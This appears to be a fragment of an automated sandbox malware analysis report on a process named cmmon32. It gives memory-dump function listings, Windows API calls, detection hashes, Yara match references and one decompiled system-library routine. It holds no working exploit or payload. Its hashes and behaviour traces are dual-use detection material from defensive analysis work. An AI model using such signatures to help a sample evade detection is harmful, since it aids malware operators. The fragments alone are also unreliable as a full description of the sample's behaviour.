                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: fd1c55f362b8e762f6494c60c2fec603f26d5efa1717934a2af3015b02cef79b
                                                            • Instruction ID: d13f3d3d0d33525fe4be4dd28af7a832662f26890c8c6f2d434483573a18d8e3
                                                            • Opcode Fuzzy Hash: fd1c55f362b8e762f6494c60c2fec603f26d5efa1717934a2af3015b02cef79b
                                                            • Instruction Fuzzy Hash: 4B900261292045527545B15944045074166B7E0687B91C012A1405A50C8566E86AF661
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04529860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 39c4bf2ce54a3979b787dc4b433c83bd8975dc10638a02b0d613b46fb478fcb9
                                                            • Instruction ID: 4dccd26cc39d52c8672fbc7d86233c8cc2fba3171933d9bc2fb73989efd917a9
                                                            • Opcode Fuzzy Hash: 39c4bf2ce54a3979b787dc4b433c83bd8975dc10638a02b0d613b46fb478fcb9
                                                            • Instruction Fuzzy Hash: 6890027125100813F111615945047070169A7D0687F91C412A0415658D9696D966B161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04529910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 479a0b12784b1bf05c91b3819bd7230d937a0ef6a2b31c23b67fc93e8d8832ba
                                                            • Instruction ID: c324a024072fcc2bef660928dc62e452dab71075663b4e6d26c0ea43b29ee4a0
                                                            • Opcode Fuzzy Hash: 479a0b12784b1bf05c91b3819bd7230d937a0ef6a2b31c23b67fc93e8d8832ba
                                                            • Instruction Fuzzy Hash: 9F9002B125100802F140715944047460165A7D0747F51C011A5055654E8699DDE976A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045299A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e161ddf6476a1362f7fe3fa237cabd82b5a6140c067279029f4a9a77d28567e3
                                                            • Instruction ID: ec3bfbf4279e4b94579c097381f43948559d692bce8baf12a48c589efadc6b1b
                                                            • Opcode Fuzzy Hash: e161ddf6476a1362f7fe3fa237cabd82b5a6140c067279029f4a9a77d28567e3
                                                            • Instruction Fuzzy Hash: D19002A139100842F10061594414B060165E7E1747F51C015E1055654D8659DC667166
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04529A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 6b93f95643bbbc431befde6693554870bdab0e201925bb92707cc472be7a6fba
                                                            • Instruction ID: 4cacdffea3d314c1e4881e09cef95e4391045ebdf61be52ec85a6537f7e6af1c
                                                            • Opcode Fuzzy Hash: 6b93f95643bbbc431befde6693554870bdab0e201925bb92707cc472be7a6fba
                                                            • Instruction Fuzzy Hash: F190026126180442F20065694C14B070165A7D0747F51C115A0145654CC955D8757561
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027DB490 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 92sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 027DB54B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: net.dll$wininet.dll
                                                            • API String ID: 3472027048-1269752229
                                                            • Opcode ID: 83ada1723845c6952aa969ead9a3735fdd177ab5aebfb88c41cd298f33f339f1
                                                            • Instruction ID: 62f37a7d6e2bfdb39f897c934d88c56d1b02a6fb7690254f5d5792b7de5a0524
                                                            • Opcode Fuzzy Hash: 83ada1723845c6952aa969ead9a3735fdd177ab5aebfb88c41cd298f33f339f1
                                                            • Instruction Fuzzy Hash: 87319EB5600604ABD715DFA4D884FABB7F9FB88304F14851EE65E5B244D7B0B5448BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027DB484 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 027DB54B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: net.dll$wininet.dll
                                                            • API String ID: 3472027048-1269752229
                                                            • Opcode ID: dd04b9617db62cb77718a9f9f30dde7b8823e9ae896c4d7a473cecb04fbe80eb
                                                            • Instruction ID: 584f8920b768d31fe8c6b9cc07bceed4ac8006be829e5346aa3b47bd2e07e2b7
                                                            • Opcode Fuzzy Hash: dd04b9617db62cb77718a9f9f30dde7b8823e9ae896c4d7a473cecb04fbe80eb
                                                            • Instruction Fuzzy Hash: 0C31E0B4A00204BBD714DFA4D885FAAF7B9FB44304F10812DEA5D6B244D7B0B5548BE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027CFCB0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?), ref: 027CFDD3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID: @
                                                            • API String ID: 3188754299-2766056989
                                                            • Opcode ID: d8a87b0e6ab7944186ac67d32a5613fea81a6b2e25545153113b3b616fdbfee2
                                                            • Instruction ID: 5a0639f9b767b2f0632157b87fcab95163f6462f6984c96ff3202ec5a4e677ce
                                                            • Opcode Fuzzy Hash: d8a87b0e6ab7944186ac67d32a5613fea81a6b2e25545153113b3b616fdbfee2
                                                            • Instruction Fuzzy Hash: 047182B2900108ABDB26EB64CC88FFBB37DFF55304F04499DE51996181EB70A6858F61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027D5220 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 027D5237
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID: @J7<
                                                            • API String ID: 2538663250-2016760708
                                                            • Opcode ID: e006b69a5c18fdf335b8a2d7061c4d4c71bc06e8e72711ad79a66afbe72e67d8
                                                            • Instruction ID: 0bbea1aedd94cf172a8134ca771c464d0207b2e1acfbccc66371a3b3c0004dcc
                                                            • Opcode Fuzzy Hash: e006b69a5c18fdf335b8a2d7061c4d4c71bc06e8e72711ad79a66afbe72e67d8
                                                            • Instruction Fuzzy Hash: 71311EB6A0060AAFDB00DFD8D880DEFB7B9BF88304B508559E515EB214D775EE458BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027CE80F Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(027D4232,?,?,027D4232,00000000,?), ref: 027CE7CA
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 84c8d8da060dc3e854bc5ff66d7139c0fee64326bf9aa11a5049956298c3acca
                                                            • Instruction ID: 088873d5f9db66a74d3fac6a0b935aa338f03bb5874b6df342220e270acc4e8b
                                                            • Opcode Fuzzy Hash: 84c8d8da060dc3e854bc5ff66d7139c0fee64326bf9aa11a5049956298c3acca
                                                            • Instruction Fuzzy Hash: C731AE71201706AFD721DF74C8C4BC67F60FF49724F6806ACDA544B287DB29E042CA90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027CB150 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 027CB1C2
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 8489fcc92341f42d66faac6a62ee3c93024a01d1882fc47015a7f916a59bd378
                                                            • Instruction ID: 9849d3ba1bd75b0bb7ed039c69171e8f97bf15a702471ea74e027e7455897219
                                                            • Opcode Fuzzy Hash: 8489fcc92341f42d66faac6a62ee3c93024a01d1882fc47015a7f916a59bd378
                                                            • Instruction Fuzzy Hash: 3A015EB5E4020DABDF10DAA0DC46FDEB7B99B14308F144198E909A7240F631EB04CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027DB5D0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,078ACDDD,00000000,00000000,027CDDAA,?,?,?,078ACDDD,?), ref: 027DB612
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: a050dcef47728ac29ab368adc1541b2c598cdab5ced67e3ad3797b0fe75f6ca2
                                                            • Instruction ID: e604c1b1f37b449a96b4259ad16a89f2628ee1b563287702946579381064b949
                                                            • Opcode Fuzzy Hash: a050dcef47728ac29ab368adc1541b2c598cdab5ced67e3ad3797b0fe75f6ca2
                                                            • Instruction Fuzzy Hash: 5CF06D7378030436E72165EA9C02F9BB6ADDB85B71F540029FB0CEA2C0E992F8014AB4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027DC9D8 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(027D6E26,?,027D75BD,027D75BD,?,027D6E26,00000000,?,?,?,?,00000000,00000000,00000002), ref: 027DCA3D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: a4d521e3780af0d64b5cf470f13098c19ba62c6ebb2819cf680370de7f4a23a9
                                                            • Instruction ID: 633a1664f70b63ea7896942f02eef00bf35832967a4be2ef0112944d7fc6cf67
                                                            • Opcode Fuzzy Hash: a4d521e3780af0d64b5cf470f13098c19ba62c6ebb2819cf680370de7f4a23a9
                                                            • Instruction Fuzzy Hash: 08E06DB1200214BBC724DF59CC45E973B6DEF85660F118059FD099B251C230E900CBF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027CE7A0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(027D4232,?,?,027D4232,00000000,?), ref: 027CE7CA
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: c83b5e28e8a00fd93af8028a2a09e4ce519e2b2d6651ff97d2aab342c39d1877
                                                            • Instruction ID: b0046ab8ca9888a44dbeaf6ac17599b1e9d921345e1241d745649ff34bd8aa72
                                                            • Opcode Fuzzy Hash: c83b5e28e8a00fd93af8028a2a09e4ce519e2b2d6651ff97d2aab342c39d1877
                                                            • Instruction Fuzzy Hash: 51E086756402092BFB2466B89C45F6633588B48728F684678FA1CDB6C2D674F6428154
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027DCA50 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,67F1BF61,00000000,?), ref: 027DCA7D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 46db6303f9a58a8c7d09dc1a2f0754141f145a90f386e2de4ae6793d98ed8e37
                                                            • Instruction ID: d6be2a5f4ba7fe8a63ec91be130b2d7daba94101f43e3f8b175fc843e3acb479
                                                            • Opcode Fuzzy Hash: 46db6303f9a58a8c7d09dc1a2f0754141f145a90f386e2de4ae6793d98ed8e37
                                                            • Instruction Fuzzy Hash: 2CE01AB1200204ABCB14EF49DC48EA737ADAF88750F014058B90957241C630E910CAB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027DCA10 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(027D6E26,?,027D75BD,027D75BD,?,027D6E26,00000000,?,?,?,?,00000000,00000000,00000002), ref: 027DCA3D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: a317e6132b889e06773fbbe00fc17c7e823b24563ddeed233e7f5cbfe3f53d2a
                                                            • Instruction ID: 66fe502c0ff972ccfa7115aeed8cd83469145ea39623fe864f54949eae9e8002
                                                            • Opcode Fuzzy Hash: a317e6132b889e06773fbbe00fc17c7e823b24563ddeed233e7f5cbfe3f53d2a
                                                            • Instruction Fuzzy Hash: D8E046B2310208ABCB24EF89DC44EAB37ADEF88760F018058FE095B241C630F910CAF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027DCBB0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,027CE0F2,027CE0F2,?,00000000,?,?), ref: 027DCBE0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LookupPrivilegeValue
                                                            • String ID:
                                                            • API String ID: 3899507212-0
                                                            • Opcode ID: 82c5a5ab97d4eb4480414d61d3416bef4d430d63bd1f97b56dd2d6bdd6b819e2
                                                            • Instruction ID: 50541007e21c8582af7128e80f474dd4d439f4d8be88e02f4bd990af87dabe6d
                                                            • Opcode Fuzzy Hash: 82c5a5ab97d4eb4480414d61d3416bef4d430d63bd1f97b56dd2d6bdd6b819e2
                                                            • Instruction Fuzzy Hash: E0E01AB1200304ABC724EF49CC44EE737ADAF88654F014058BA0957241C630E9108AB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027DCA52 Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,67F1BF61,00000000,?), ref: 027DCA7D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 16488a0969da05b2cb0e09bf84498e270ecd2a7857b61221015f7094cc6fefb7
                                                            • Instruction ID: 27bdd9e384b3e7880635163064289c384543d8cbf748f758444d9d731eb7736f
                                                            • Opcode Fuzzy Hash: 16488a0969da05b2cb0e09bf84498e270ecd2a7857b61221015f7094cc6fefb7
                                                            • Instruction Fuzzy Hash: 55E046B2300204AFCB24EF58DC48EEB3B69EF88350F018158F9099B281C230E910CAB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027CE5A0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,027C8D8A,?), ref: 027CE5D1
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 6741bafb0424fa7b4ab3383a257de2b7a2000609cec0738d4b89301aaf0b93da
                                                            • Instruction ID: 1f4024bbb3387e959e4e3035346738f491b3dd905cffa9ff6cc58434b4f666a9
                                                            • Opcode Fuzzy Hash: 6741bafb0424fa7b4ab3383a257de2b7a2000609cec0738d4b89301aaf0b93da
                                                            • Instruction Fuzzy Hash: 5CD05EB57843093BFA10A7F59C06F1A328D4B44761F544068FA0CE72C2E950F2008565
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0452967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 5a4a3a1c38a740da365a9de810e31417287b3cbc7ca11d618a6085fba4b790ac
                                                            • Instruction ID: 17dba3ffacc9696046cebc841402da2e65c322d3a7d9d3dddc9c2f3816df4448
                                                            • Opcode Fuzzy Hash: 5a4a3a1c38a740da365a9de810e31417287b3cbc7ca11d618a6085fba4b790ac
                                                            • Instruction Fuzzy Hash: 55B02BB19010C4C9F700D76007087173A5077C0702F12C022D1020340A0338E094F1B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 0457FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 53%
                                                            			E0457FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0452CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04575720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04575720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                            0x0457fdda
                                                            0x0457fde2
                                                            0x0457fde5
                                                            0x0457fdec
                                                            0x0457fdfa
                                                            0x0457fdff
                                                            0x0457fe0a
                                                            0x0457fe0f
                                                            0x0457fe17
                                                            0x0457fe1e
                                                            0x0457fe19
                                                            0x0457fe19
                                                            0x0457fe19
                                                            0x0457fe20
                                                            0x0457fe21
                                                            0x0457fe22
                                                            0x0457fe25
                                                            0x0457fe40

                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0457FDFA
                                                            Strings
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0457FE2B
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0457FE01
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                            • API String ID: 885266447-3903918235
                                                            • Opcode ID: a1a4877971e12b2a92b4dd32e274ec01a3c307c89ba4e0d55b915c39b06d1c35
                                                            • Instruction ID: c45c053610e81c6333d7c7df413c397f3541aa6d824a059ad467a06f61bc3de5
                                                            • Opcode Fuzzy Hash: a1a4877971e12b2a92b4dd32e274ec01a3c307c89ba4e0d55b915c39b06d1c35
                                                            • Instruction Fuzzy Hash: C7F0FC322005017FEA211A55EC01F237B6AFB84770F240315F624555D1E9A2F820A6F4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%